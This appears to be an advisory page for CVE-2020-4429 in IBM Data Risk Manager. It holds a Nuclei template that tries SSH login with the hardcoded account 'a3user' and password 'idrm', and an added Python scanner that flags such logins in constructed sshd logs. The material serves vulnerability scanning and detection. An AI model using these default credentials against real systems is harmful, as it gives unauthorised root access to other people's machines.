IBM Data Risk Manager 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, and 2.0.6 contains a default password for an IDRM administrative account. A remote attacker could exploit this vulnerability to login and execute arbitrary code on the system with root privileges. IBM X-Force ID- 180534.
PoC code [public]
id: CVE-2020-4429

info:
  name: IBM Data Risk Manager - Hardcoded Credentials
  author: Kazgangap
  severity: critical
  description: |
    IBM Data Risk Manager 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, and 2.0.6 contains a default password for an IDRM administrative account. A remote attacker could exploit this vulnerability to login and execute arbitrary code on the system with root privileges. IBM X-Force ID- 180534.
  impact: |
    Remote attackers can gain root access and execute arbitrary code, potentially leading to complete system compromise.
  remediation: |
    Change default passwords and update to the latest version if available.
  reference:
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/180534
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/ssh/ibm_drm_a3user.rb
    - https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-4429
    cwe-id: CWE-798
    epss-score: 0.80629
    epss-percentile: 0.99088
    cpe: cpe:2.3:a:ibm:data_risk_manager:2.0.1:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 1
    vendor: ibm
    product: data_risk_manager
  tags: cve,cve2020,ibm,default-login,vkev

javascript:
  - pre-condition: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      var response = c.ConnectSSHInfoMode(Host, Port);
      response["UserAuth"].includes("password")

    code: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      c.Connect(Host,Port,Username,Password);

    args:
      Host: "{{Host}}"
      Port: "22"
      Username: "a3user"
      Password: "idrm"

    matchers:
      - type: dsl
        dsl:
          - "response == true"
          - "success == true"
        condition: and
# digest: 4a0a00473045022100abaf65e415bebef66e6b5741714a821f270d3d9436987e9891db66215ea5e17502202b837fd943134c24166ef76829378cbfc0cfabf93af4b332e526746bd8ec68b7:922c64590222798bb761d5b6d8e72950
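The template above succeeds when SSH password authentication for the a3user account is accepted, so the same event is what a defender should watch for in sshd logs on an IDRM host. The following is an added example (not part of the Nuclei template or any IBM tooling) that flags accepted password logins for that account and repeated failed password attempts against it; the log lines are constructed for illustration.

```python
import re
from collections import Counter

# Default IDRM administrative account named in the template (CVE-2020-4429).
DEFAULT_ACCOUNT = "a3user"

# Constructed sshd log lines (documentation IP ranges), not real captures.
SAMPLE_LOG = """\
Apr 21 10:01:02 idrm sshd[1201]: Failed password for a3user from 203.0.113.9 port 50312 ssh2
Apr 21 10:01:05 idrm sshd[1201]: Accepted password for a3user from 203.0.113.9 port 50312 ssh2
Apr 21 10:02:10 idrm sshd[1210]: Accepted publickey for ops from 192.0.2.7 port 40011 ssh2
Apr 21 10:03:44 idrm sshd[1222]: Failed password for a3user from 198.51.100.4 port 51000 ssh2
Apr 21 10:03:46 idrm sshd[1222]: Failed password for a3user from 198.51.100.4 port 51000 ssh2
"""

# Matches the standard OpenSSH "Accepted/Failed <method> for <user> from <src>" form.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def scan_sshd_log(text, account=DEFAULT_ACCOUNT, fail_threshold=2):
    """Return (alert_kind, source_ip) tuples for the default account:
    any accepted *password* login (the condition the template matches on,
    i.e. the vendor default is still in place) and any source that failed
    password auth for it at least fail_threshold times (guessing)."""
    alerts = []
    failures = Counter()
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m or m.group("user") != account:
            continue
        if m.group("result") == "Accepted" and m.group("method") == "password":
            alerts.append(("accepted_default_account_login", m.group("src")))
        elif m.group("result") == "Failed":
            failures[m.group("src")] += 1
    for src, n in failures.items():
        if n >= fail_threshold:
            alerts.append(("password_guessing_default_account", src))
    return alerts


if __name__ == "__main__":
    for kind, src in scan_sshd_log(SAMPLE_LOG):
        print(f"{kind}: {src}")
```

An accepted password login for a3user after the remediation (password changed, or key-only auth enforced) is itself a sign the fix did not take.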